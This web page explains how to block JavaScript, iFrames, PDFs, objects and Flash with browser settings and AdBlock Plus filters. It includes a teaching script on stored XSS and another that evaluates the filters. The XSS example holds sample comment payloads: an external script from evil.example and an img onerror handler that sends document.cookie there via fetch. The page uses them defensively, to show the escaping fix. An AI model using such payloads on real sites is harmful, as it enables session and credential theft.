Exploitable Web Content Blocking Test


JavaScript

Although JavaScript is the main client-side scripting language of the web, it also opens up many potential attack vectors.

JavaScript can easily be blocked by default in your browser settings and then whitelisted on a per-site basis. This gives you full functionality on the sites you trust, together with the security of having it disabled everywhere else.

AdBlockPlus can block external script files, but it cannot block inline scripts: they are part of the page's own HTML and never produce a separate request for a filter to match. You must use your browser settings for those.

The main reason for blocking JavaScript is to protect against compromised or malicious websites. Many websites have cross-site scripting (XSS) vulnerabilities that let an attacker inject JavaScript into a page that other visitors then load, often through a comment form that inserts what users submit into the page without escaping it.
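As an added example (not part of this test page), here is the comment-form mistake described above in working JavaScript: a renderer that concatenates user input into HTML, a "strip the script tags" patch that still lets an event-handler payload through, and the escaping renderer that actually fixes it. The comments and the evil.example hostname are constructed for the demonstration.

```javascript
// Added example, not part of the test page: how a comment form that does not
// escape user input becomes a stored XSS vector, and why stripping <script>
// tags is not a fix. The comments below are constructed, as an attacker
// might submit them; evil.example is a placeholder hostname.

const COMMENTS = [
  { author: 'alice', body: 'Great article, thanks!' },
  { author: 'mallory', body: '<script src="https://evil.example/steal.js"></script>' },
  // No <script> tag at all: the payload runs from an event-handler attribute.
  { author: 'mallory', body: '<img src=x onerror="fetch(\'https://evil.example/?c=\' + document.cookie)">' },
];

// Vulnerable: the submitted text is concatenated straight into the page's HTML,
// so the browser parses and runs whatever tags it contains.
function renderCommentUnsafe(c) {
  return `<li><b>${c.author}</b>: ${c.body}</li>`;
}

// Still vulnerable: a blacklist that only removes <script> tags lets the
// onerror handler in the third comment through untouched.
function renderCommentStripScript(c) {
  const stripped = c.body.replace(/<\s*\/?\s*script[^>]*>/gi, '');
  return `<li><b>${c.author}</b>: ${stripped}</li>`;
}

// Fixed: every character with meaning to the HTML parser is encoded, so the
// comment is displayed as text and never becomes markup.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}
function renderCommentSafe(c) {
  return `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</li>`;
}

// Rough detector used only to score the renderers: does the output still
// contain a script tag, or a tag carrying an on* event-handler attribute?
function containsActiveContent(html) {
  return /<script\b|<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Render the whole thread with a renderer and count comments that would execute.
function countExecutable(renderer) {
  return COMMENTS.map(renderer).filter(containsActiveContent).length;
}

for (const [name, renderer] of [
  ['unsafe', renderCommentUnsafe],
  ['strip <script>', renderCommentStripScript],
  ['escape', renderCommentSafe],
]) {
  console.log(`${name.padEnd(15)} executable comments: ${countExecutable(renderer)}`);
}
```

Run with node: the unsafe renderer leaves two executable comments, the script-stripping one still leaves the image payload, and only the escaping renderer leaves none. In a real page the same rule applies on the DOM side (use textContent, not innerHTML), and a Content-Security-Policy that forbids inline script and untrusted script sources is the defence in depth that blocking JavaScript in the browser approximates from the client.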


iFrames

iFrames allow an external document to be loaded within a frame on a webpage. This means that potentially malicious content could be loaded in the background without your knowledge, even though your URL bar displays a trusted site.

They are also used in clickjacking attacks, where an invisible iFrame is loaded on top of the page content. As you click around the visible site, you are secretly clicking on the site loaded in the invisible iFrame. This could be a malware site, a spam site, or even the password reset form for one of your online accounts.

In order to block iFrames with AdBlockPlus, add the following to your filters:

*$subdocument,domain=~whitelisted.tld|~two.tld|~three.tld

You can whitelist as many domains as you like by adding further ~domain entries to the list, separated by |. The filter blocks subdocuments everywhere except on the listed domains.


PDFs

Exploits relating to PDF files are generally due to vulnerabilities in PDF readers, not in the PDF format itself.

The best-known PDF reader, Adobe Reader, has a long history of vulnerabilities and is the main target for PDF-borne malware. The Google Docs PDF viewer is a good alternative: it parses the PDF on Google's servers and displays the result as HTML, so a payload aimed at a vulnerable local reader is never handed to one.

In order to block PDFs with AdBlockPlus, add the following to your filters:

*.pdf

This will only block embedded PDF documents. Direct links or downloadable PDF documents will not be blocked, because blocking filters are not applied to the page you navigate to, only to the resources it loads. Note also that the pattern matches any URL containing ".pdf", not only URLs that end in it.


Objects

Objects are another form of subdocument or embedded content, so there is a lot of crossover when it comes to blocking them.

HTML documents displayed within objects are very similar to iFrames, so they are blocked by the same filter. Multimedia content such as PDFs or Flash displayed within an object is also blocked by the corresponding filters. However, you should still block all objects, just to be safe!

In order to block objects with AdBlockPlus, add the following to your filters:

*$object


Flash

Don't worry, this isn't a real Flash file! It's just a text file containing a single character, saved with the file extension ".swf".

If you have Flash disabled in your browser (most modern browsers do this by default), you will still see the "Right-click to run Adobe Flash Player" placeholder. The browser's own plugin blocking takes precedence over your ad blocker when it comes to stopping Flash from running. If Flash is accidentally enabled in your browser settings, your ad blocker acts as a second line of defence.

In order to block .swf files with AdBlockPlus, add the following to your filters:

*.swf

This will only block embedded Flash files. Direct links or downloadable Flash files will not be blocked.
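To show how the four filters recommended on this page (the iFrame, PDF, Object and Flash rules) actually decide what is blocked, here is an added example that is not part of the test page or of AdBlock Plus: a small JavaScript evaluator for the subset of the filter syntax used above. It models two real AdBlock Plus behaviours that explain the caveats in the text, namely that blocking filters are never applied to the page you navigate to (so direct .pdf/.swf links are not blocked) and that an unanchored pattern is a substring match (so *.pdf also matches a URL that merely contains ".pdf"). The sample requests and hostnames are constructed placeholders.

```javascript
// Added example, not part of the test page: a minimal evaluator for the
// subset of AdBlock Plus blocking-filter syntax used on this page.
// Supported: '*' wildcard, '^' separator, '|' / '||' anchors, request-type
// options (subdocument, object, script, ...) and domain=a|~b lists.
// It models two real ABP behaviours that explain the caveats in the text:
//   1. blocking filters never apply to top-level navigations (type
//      "document"), so a direct link to a .pdf or .swf is not blocked;
//   2. an unanchored pattern is a substring match, so *.pdf also matches
//      a URL that merely contains ".pdf" somewhere in it.

const REQUEST_TYPES = new Set([
  'script', 'image', 'stylesheet', 'object', 'subdocument', 'document', 'other',
]);

// Translate an ABP pattern into a RegExp.
function patternToRegExp(pattern) {
  let p = pattern;
  let re = '';
  if (p.startsWith('||')) {            // ||example.com matches at a host boundary
    re += '^[a-z][a-z0-9+.-]*://([^/?#]+\\.)?';
    p = p.slice(2);
  } else if (p.startsWith('|')) {      // |https:// anchors at the start of the URL
    re += '^';
    p = p.slice(1);
  }
  let anchorEnd = false;
  if (p.endsWith('|')) {               // .pdf| anchors at the end of the URL
    anchorEnd = true;
    p = p.slice(0, -1);
  }
  for (const ch of p) {
    if (ch === '*') re += '.*';
    else if (ch === '^') re += '(?:[^a-zA-Z0-9_.%-]|$)';
    else re += ch.replace(/[.+?()[\]{}\\\/$|]/g, '\\$&');
  }
  if (anchorEnd) re += '$';
  return new RegExp(re, 'i');
}

// Split "pattern$opt1,opt2" into a filter object.
function parseFilter(filter) {
  const sep = filter.indexOf('$');
  const pattern = sep === -1 ? filter : filter.slice(0, sep);
  const opts = sep === -1 ? [] : filter.slice(sep + 1).split(',');
  const f = { text: filter, regex: patternToRegExp(pattern), types: new Set(), domains: new Set(), notDomains: new Set() };
  for (const opt of opts) {
    if (opt.startsWith('domain=')) {
      for (const d of opt.slice('domain='.length).split('|')) {
        if (d.startsWith('~')) f.notDomains.add(d.slice(1).toLowerCase());
        else f.domains.add(d.toLowerCase());
      }
    } else if (REQUEST_TYPES.has(opt)) {
      f.types.add(opt);
    } else {
      throw new Error(`option not supported by this example: ${opt}`);
    }
  }
  return f;
}

// request = { url, type, documentDomain }; documentDomain is the hostname of
// the page that issued the request (the site you are visiting).
function filterMatches(f, request) {
  if (request.type === 'document') return false;              // behaviour 1 above
  if (f.types.size > 0 && !f.types.has(request.type)) return false;
  const host = request.documentDomain.toLowerCase();
  const listed = (set) => [...set].some((d) => host === d || host.endsWith('.' + d));
  if (f.domains.size > 0 && !listed(f.domains)) return false; // domain=a: only on a
  if (listed(f.notDomains)) return false;                      // domain=~a: not on a
  return f.regex.test(request.url);                            // behaviour 2 above
}

// Return the first filter that blocks the request, or null.
function blockingFilter(filters, request) {
  return filters.find((f) => filterMatches(f, request)) || null;
}

// The four filters recommended on this page.
const PAGE_FILTERS = [
  '*$subdocument,domain=~whitelisted.tld|~two.tld|~three.tld',
  '*.pdf',
  '*$object',
  '*.swf',
].map(parseFilter);

// Constructed sample requests (hostnames are placeholders, not real sites).
const SAMPLE_REQUESTS = [
  { url: 'https://ads.example/frame.html', type: 'subdocument', documentDomain: 'news.example' },
  { url: 'https://ads.example/frame.html', type: 'subdocument', documentDomain: 'app.whitelisted.tld' },
  { url: 'https://cdn.example/report.pdf', type: 'object', documentDomain: 'news.example' },
  { url: 'https://cdn.example/report.pdf', type: 'document', documentDomain: 'cdn.example' },
  { url: 'https://cdn.example/banner.swf', type: 'object', documentDomain: 'news.example' },
  { url: 'https://cdn.example/theme.pdfstyle.css', type: 'stylesheet', documentDomain: 'news.example' },
  { url: 'https://static.example/app.js', type: 'script', documentDomain: 'news.example' },
];

// Evaluate every sample request and return the verdicts.
function evaluateSamples() {
  return SAMPLE_REQUESTS.map((r) => {
    const f = blockingFilter(PAGE_FILTERS, r);
    return { url: r.url, type: r.type, blocked: f !== null, by: f ? f.text : null };
  });
}

for (const v of evaluateSamples()) {
  console.log(`${v.blocked ? 'BLOCK' : 'allow'} ${v.type.padEnd(11)} ${v.url}${v.by ? '  <- ' + v.by : ''}`);
}
```

Run with node. The iFrame on news.example is blocked while the same iFrame on a subdomain of whitelisted.tld is allowed; the embedded report.pdf is blocked but the same URL opened as a page is not; the .swf is caught by *$object before *.swf is even consulted; and the unrelated stylesheet whose name happens to contain ".pdf" is blocked too, which is the substring caveat. If that over-blocking matters, anchor the pattern with a trailing | (for example .pdf|), which the evaluator also supports.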